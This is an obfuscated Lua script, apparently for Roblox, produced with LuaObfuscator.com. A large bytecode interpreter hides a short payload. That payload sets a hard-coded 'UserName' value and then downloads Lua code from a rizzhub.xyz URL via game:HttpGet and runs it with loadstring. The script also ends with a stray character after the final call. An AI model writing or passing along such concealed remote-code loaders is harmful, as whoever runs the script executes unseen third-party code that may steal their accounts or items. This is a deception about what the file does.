--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=v2(v0(v30,16));if v19 then local v78=v5(v70,v19);v19=nil;return v78;else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=1930 -(513 + 1417) ;local v72;while true do if (v71==(0 + 0)) then v72=(v31/(((1187 -(434 + 412)) -(319 + 20))^(v32-1)))%((654 -(39 + (1308 -(177 + 518))))^(((v33-(1784 -(261 + 1522))) -(v32-(1199 -(1107 + 91)))) + 1 + 0)) ;return v72-(v72%(2 -1)) ;end end else local v73=0 -0 ;local v74;while true do if (v73==0) then v74=2^(v32-(1 + 0)) ;return (((v31%(v74 + v74))>=v74) and (629 -(518 + 110))) or (0 -0) ;end end end end local function v21()local v34=0 + 0 ;local v35;while true do if ((942 -((318 -185) + 808))==v34) then return v35;end if (v34==(1309 -((2683 -(126 + 1668)) + 420))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1 + 0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (3 -1) ;return (v37 * (806 -550)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (775 -((120 -78) + 376 + 354)) );v18=v18 + (1587 -(526 + 1057)) ;return (v41 * (13458731 + 3318485)) + (v40 * (288554 -223018)) + (v39 * (2165 -(1360 + (1154 -605)))) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,(1943 -(230 + 22)) -(1004 + (1746 -(81 + 979))) ,934 -(166 + 748) ) * ((6 -4)^32)) + v42 ;local v46=v20(v43,1128 -((398 -289) + 998) ,99 -68 );local v47=((v20(v43,1645 -(386 + 1227) )==1) and  -((1 -0) -0)) or (210 -(11 + 198)) ;if (v46==(0 -(0 -0))) then if (v45==((67 -(16 + 51)) + 0)) then return v47 * (0 -0) ;else local v79=0 -0 ;while true do if (v79==(0 -0)) then v46=1 + 0 ;v44=0;break;end end end elseif (v46==2047) then return ((v45==(0 + 0)) and (v47 * (1/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(388 + 635) ) * (v44 + (v45/((5 -3)^(1921 -(958 + 911))))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==((1369 -503) -(370 + 496))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(925 -(72 + 852)) );v18=v18 + v48 ;local v50={};for v67=446 -(272 + 173) , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==(2 + 1)) then v58=nil;v59=nil;v51=2 + 2 ;end if (v51~=0) then else v52=0 -0 ;v53=nil;v51=1 + 0 ;end if ((2 -1)==v51) then v54=nil;v55=nil;v51=1994 -(1328 + 664) ;end if (v51~=(6 -4)) then else v56=nil;v57=nil;v51=8 -5 ;end if (v51==(658 -(376 + 278))) then while true do if (v52==0) then local v95=0;while true do if (v95~=0) then else v53=0;v54=nil;v95=711 -(484 + 226) ;end if (v95~=1) then else v52=600 -(415 + 184) ;break;end end end if (1==v52) then local v96=0 -0 ;while true do if (v96~=(405 -(117 + 287))) then else v52=1 + 1 ;break;end if (v96~=0) then else v55=nil;v56=nil;v96=1;end end end if (v52==(1 + 2)) then v59=nil;while true do local v103=0;while true do if (v103==(0 -0)) then if (v53==(0 + 0)) then local v108=1614 -(1276 + 338) ;local v109;while true do if (v108==0) then v109=0;while true do if (v109~=2) then else v53=1;break;end if (v109==1) then local v115=0;while true do if (v115==1) then v109=1580 -(316 + 1262) ;break;end if (v115==0) then v56={};v57={v54,v55,nil,v56};v115=1;end end end if (v109~=(1345 -(718 + 627))) then else v54={};v55={};v109=1 -0 ;end end break;end end end if (v53~=1) then else local v110=0;local v111;while true do if (0==v110) then v111=0 -0 ;while true do if (v111==(1551 -(307 + 1244))) then local v116=0;while true do if (v116==(0 -0)) then v58=v23();v59={};v116=1 + 0 ;end if (v116==1) then v111=1;break;end end end if (v111==(2 + 0)) then v53=5 -3 ;break;end if (1==v111) then local v117=0 + 0 ;while true do if (v117~=0) then else for v136=910 -(865 + 44) ,v58 do local v137=0;local v138;local v139;local v140;local v141;while true do if (v137~=1) then else local v163=0 + 0 ;while true do if ((0 + 0)~=v163) then else v140=nil;v141=nil;v163=1 + 0 ;end if (v163==1) then v137=2;break;end end end if (v137==(0 + 0)) then v138=0;v139=nil;v137=1;end if (v137==2) then while true do if (0~=v138) then else local v170=0 -0 ;while true do if (v170~=(1 -0)) then else v138=1;break;end if (v170==(0 -0)) then v139=0;v140=nil;v170=1 + 0 ;end end end if (v138==(1 + 0)) then v141=nil;while true do if (v139==(1 + 0)) then if (v140==(1215 -(592 + 622))) then v141=v21()~=(0 + 0) ;elseif (v140==(2 + 0)) then v141=v24();elseif (v140==(5 -2)) then v141=v25();end v59[v136]=v141;break;end if (v139~=(0 + 0)) then else local v179=0 -0 ;while true do if (v179==(976 -(761 + 215))) then local v187=1829 -(885 + 944) ;local v188;while true do if ((0 -0)==v187) then v188=910 -(223 + 687) ;while true do if ((0 -0)==v188) then v140=v21();v141=nil;v188=1;end if (v188==1) then v179=1 -0 ;break;end end break;end end end if (v179==1) then v139=1;break;end end end end break;end end break;end end end v57[10 -7 ]=v21();v117=1;end if (v117~=(1 + 0)) then else v111=4 -2 ;break;end end end end break;end end end v103=1;end if (v103~=1) then else if (v53==2) then local v112=0;local v113;while true do if (v112~=0) then else v113=0 + 0 ;while true do if (0~=v113) then else for v121=2 -1 ,v23() do local v122=0 -0 ;local v123;local v124;local v125;while true do if (v122==0) then local v142=0;while true do if (v142==0) then v123=0 + 0 ;v124=nil;v142=1;end if (v142~=(1237 -(305 + 931))) then else v122=1;break;end end end if (v122==1) then v125=nil;while true do if (v123==0) then v124=0;v125=nil;v123=1617 -(749 + 867) ;end if (v123~=(1 + 0)) then else while true do if (v124==0) then v125=v21();if (v20(v125,1779 -(1172 + 606) ,1)==0) then local v171=0 + 0 ;local v172;local v173;local v174;local v175;while true do if (v171~=(1627 -(44 + 1582))) then else local v185=0;while true do if (v185==(0 + 0)) then v174=nil;v175=nil;v185=1;end if (v185==(3 -2)) then v171=5 -3 ;break;end end end if (v171~=(0 + 0)) then else local v186=0 + 0 ;while true do if (v186~=(784 -(659 + 125))) then else v172=0 -0 ;v173=nil;v186=1746 -(970 + 775) ;end if (v186~=(788 -(586 + 201))) then else v171=1 + 0 ;break;end end end if (v171~=(4 -2)) then else while true do if ((1550 -(962 + 586))~=v172) then else local v189=0 -0 ;local v190;while true do if (v189~=(0 -0)) then else v190=0;while true do if (v190~=1) then else v172=1051 -(70 + 978) ;break;end if (v190==(944 -(603 + 341))) then if (v20(v174,1 + 0 ,1)~=1) then else v175[2]=v59[v175[4 -2 ]];end if (v20(v174,2,2)==1) then v175[3]=v59[v175[3 + 0 ]];end v190=1;end end break;end end end if (v172==0) then local v191=927 -(679 + 248) ;while true do if (v191==1) then v172=1;break;end if (v191~=0) then else local v200=389 -(161 + 228) ;local v201;while true do if (v200==(0 -0)) then v201=0;while true do if (v201~=0) then else v173=v20(v125,9 -7 ,3);v174=v20(v125,3 + 1 ,6);v201=1 + 0 ;end if (v201==(716 -(210 + 505))) then v191=2 -1 ;break;end end break;end end end end end if (v172==3) then if (v20(v174,9 -6 ,3)==1) then v175[4]=v59[v175[1 + 3 ]];end v54[v121]=v175;break;end if (v172==1) then local v193=0 -0 ;local v194;while true do if (0==v193) then v194=1126 -(861 + 265) ;while true do if (1==v194) then v172=6 -4 ;break;end if (v194==(0 + 0)) then local v204=0 -0 ;local v205;while true do if (v204==(0 + 0)) then v205=0;while true do if (v205==1) then v194=1;break;end if ((248 -(145 + 103))==v205) then local v210=0 -0 ;while true do if (v210~=(333 -(47 + 286))) then else v175={v22(),v22(),nil,nil};if (v173==(0 + 0)) then local v211=0 + 0 ;while true do if (v211~=(0 + 0)) then else v175[3]=v22();v175[535 -(53 + 478) ]=v22();break;end end elseif (v173==(1635 -(182 + 1452))) then v175[7 -4 ]=v23();elseif (v173==(1 + 1)) then v175[3 + 0 ]=v23() -(2^(14 + 2)) ;elseif (v173==3) then local v216=0;local v217;while true do if (0~=v216) then else v217=0 -0 ;while true do if (v217~=0) then else v175[3]=v23() -((8 -6)^16) ;v175[4]=v22();break;end end break;end end end v210=1;end if (v210==1) then v205=1;break;end end end end break;end end end end break;end end end end break;end end end break;end end break;end end break;end end end for v126=2 -1 ,v23() do v55[v126-1 ]=v28();end v113=1 + 0 ;end if (v113==(2 -1)) then local v118=0 + 0 ;while true do if (v118==(0 + 0)) then for v143=1 + 0 ,v23() do v56[v143]=v23();end return v57;end end end end break;end end end break;end end end break;end if (v52~=2) then else local v97=136 -(24 + 112) ;while true do if (v97==(1 + 0)) then v52=735 -(606 + 126) ;break;end if (v97~=0) then else v57=nil;v58=nil;v97=1;end end end end break;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v80=1;local v81= -1;local v82={...};local v83=v12("#",...) -1 ;local function v84()local v85=v64;local v86=v65;local v87=v66;local v88=v27;local v89={};local v90={};local v91={};for v98=(249 + 54) -(97 + 206) ,v83 do if ((v98>=v87) or ((2875 -1000)>=4490)) then v89[v98-v87 ]=v82[v98 + 1 + 0 + 0 ];else v91[v98]=v82[v98 + 1 + 0 ];end end local v92=(v83-v87) + (1414 -(1365 + 48)) ;local v93;local v94;while true do local v99=731 -((225 -62) + 568) ;local v100;local v101;while true do if ((v99==((844 -(660 + 181)) -2)) or ((8495 -4961)<=(10648 -8405))) then while true do if (((3784 -1419)==(2995 -(599 + 31))) and (v100==(0 + 0))) then v101=0 + 0 ;while true do if ((v101==(1 + 0)) or ((610 + 522)<468)) then if (((1051 + 671)>(1755 -(35 + 18 + 11))) and (v94<=(2 + 3))) then if ((v94<=(6 -4)) or ((3157 -2375)==(4069 -(220 + 586)))) then if (((6197 -((1722 -(64 + 1361)) + 1507))>=(107 + 1479)) and (v94<=((0 -0) + 0))) then local v129=1704 -(386 + 1318) ;local v130;local v131;local v132;while true do if ((v129==(2 -(1515 -(1252 + 262)))) or ((60 + 19)==(867 + 3892))) then v132=nil;while true do if ((v130==(1 + 0)) or ((15554 -11388)==((15820 -(1834 + 17)) -9526))) then while true do if ((v131==0) or ((5385 -(366 + 1153 + 75))>(16403 -(16961 -4543)))) then v132=v93[1 + 1 ];v91[v132]=v91[v132](v13(v91,v132 + 1 + 0 ,v81));break;end end break;end if ((v130==(1102 -(493 + 609))) or ((9888 -7868)>=(5468 -1900))) then local v165=0 -0 ;while true do if (((2783 + 1321)>=(2776 -(158 + 8))) and (v165==1)) then v130=1 + 0 ;break;end if (((322 + 1341)<=(6379 -4315)) and (v165==(1015 -(834 + 181)))) then v131=1414 -(390 + 1024) ;v132=nil;v165=1;end end end end break;end if ((v129==(0 + 0)) or ((2913 -(719 + 1196))>=(8154 -4816))) then v130=1672 -(1357 + 315) ;v131=nil;v129=453 -(56 + 237 + 159) ;end end elseif ((4708==(900 + 1809 + 1999)) and (v94>(1 + 0))) then v91[v93[2 + 0 ]]=v93[(2 -0) + (686 -(261 + 424)) ];else local v147=0 -0 ;local v148;local v149;local v150;local v151;while true do if ((876<=949) and (v147==1)) then v150=nil;v151=nil;v147=1 + 1 ;end if (((2 + 0)==v147) or ((1914 + 1942)==(19153 -15295))) then while true do if (((1449 -(603 + 845))==v148) or ((1812 -(27 + 61))>=(3903 + 725))) then v151=nil;while true do if (((2339 + 2094)>=(1125 -599)) and (v149==(0 + 0))) then local v180=0 + 0 ;local v181;while true do if ((v180==(0 + 0)) or (4237==(1808 -(1194 + 178)))) then v181=0 -0 ;while true do if ((v181==(0 + 0)) or (3031==(1984 -1135))) then local v199=1716 -(467 + 1249) ;while true do if ((32<=(14946 -10699)) and (v199==(1 -0))) then v181=1 + 0 ;break;end if (((5503 -(35 + 782))>(2062 + 42 + 272)) and (v199==0)) then v150=v93[7 -5 ];v151=v91[v93[11 -8 ]];v199=1;end end end if ((1558<=(3714 -((2049 -(653 + 695)) + 1046))) and (1==v181)) then v149=1 + 0 ;break;end end break;end end end if ((v149==1) or (2644==(2006 + (1997 -539)))) then v91[v150 + 1 ]=v151;v91[v150]=v151[v93[13 -9 ]];break;end end break;end if ((3116>=823) and (((0 + 0) -(0 -0))==v148)) then v149=0;v150=nil;v148=1 + 0 ;end end break;end if (((10 + 14)<(4059 -(826 + 463))) and (v147==((0 -0) + 0))) then v148=937 -(849 + 88) ;v149=nil;v147=1774 -(802 + 971) ;end end end elseif ((v94<=(1755 -(991 + 761))) or ((14017 -9775)<=3212)) then v62[v93[(5 -2) + 0 ]]=v91[v93[2]];elseif ((v94>(1242 -(537 + 701))) or ((9138 -6139)>(4682 -(129 + 1103)))) then local v152=0;local v153;local v154;local v155;local v156;while true do if ((((273 + 4226) -((321 -192) + 702))==(2403 + 1265)) and (((319 + 298) -(42 + 575))==v152)) then v153=v93[2 + 0 ];v154,v155=v88(v91[v153](v13(v91,v153 + (651 -(42 + 608)) ,v93[3 + 0 ])));v152=1;end if ((v152==2) or (((4830 -(356 + 573)) -(911 + 182))==(248 + 2034))) then for v166=v153,v81 do local v167=426 -(352 + 74) ;local v168;local v169;while true do if ((0==v167) or ((2756 -(574 + 109))<=(639 -296))) then v168=350 -(152 + 198) ;v169=nil;v167=1;end if ((v167==(1 + 0)) or (((7679 + 4544) -9111)>(13651 -(10588 -(121 + 776))))) then while true do if ((v168==(0 -0)) or ((6437 -2144)==(1749 -(13 + 352)))) then v169=0 -(657 -(128 + 529)) ;while true do if (((0 + 0)==v169) or ((1101 + 2516)>(744 + 3450))) then v156=v156 + ((2 + 0) -1) ;v91[v166]=v154[v156];break;end end break;end end break;end end end break;end if ((v152==(2 -1)) or (746==(838 + 7))) then v81=(v155 + v153) -(1 + 0) ;v156=0;v152=2;end end else v80=v93[(739 -(17 + 717)) -(9 -7) ];end elseif ((v94<=(804 -(708 + 88))) or ((395 + 470)>(4669 -1766))) then if (((1729 + 736)>((3235 -(139 + 1476)) -422)) and (v94<=((2 -0) + 4))) then v91[v93[1 + 1 ]]=v93[9 -6 ]~=0 ;elseif (((6207 -4330)<(1614 + 720)) and (v94==(809 -(403 + 399)))) then v91[v93[1 + 1 ]]=v62[v93[9 -(1845 -(1234 + 605)) ]];else do return;end end elseif (((252 -177)<=(2878 -(139 + 58))) and (v94<=9)) then if ((v91[v93[2]]==v93[1211 -(1065 + 142) ]) or (92>=(2722 -1338))) then v80=v80 + 1 + 0 + 0 ;else v80=v93[66 -(25 + 38) ];end elseif (((605 -(38 + 16))<=(893 + 3132)) and (v94==(2 + 8))) then for v161=v93[1 + 1 ],v93[3] do v91[v161]=nil;end else v91[v93[2]]();end v80=v80 + 1 ;break;end if (((4220 -(279 + 104))==(19140 -15303)) and (0==v101)) then local v114=605 -(473 + 132) ;while true do if (((3 -(1 + 1))==v114) or (1760<1112)) then v101=912 -(312 + 599) ;break;end if ((0==v114) or ((11145 -7612)<=(237 + 2473))) then v93=v85[v80];v94=v93[1];v114=1 + 0 ;end end end end break;end end break;end if (((3189 -(135 + (1290 -928)))>=(2145 -1295)) and (v99==(1812 -(372 + 1440)))) then v100=0;v101=nil;v99=1 + 0 ;end end end end A,B=v27(v11(v84));if  not A[1] then local v102=v60[4][v80] or "?" ;error("Script error at ["   .. v102   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365724E616D65030F3O004C6F67616E6D633132333435363738030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F4D61696E2E6C756100163O0012023O00014O000A000100013O0026093O000200010001002O043O00020001001202000100013O0026090001000500010001002O043O00050001001202000200033O001203000200023O001207000200043O001207000300053O002001000300030006001202000500074O0006000600014O0005000300066O00023O00022O000B000200010001002O043O00150001002O043O00050001002O043O00150001002O043O000200012O00083O00017O00163O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);e
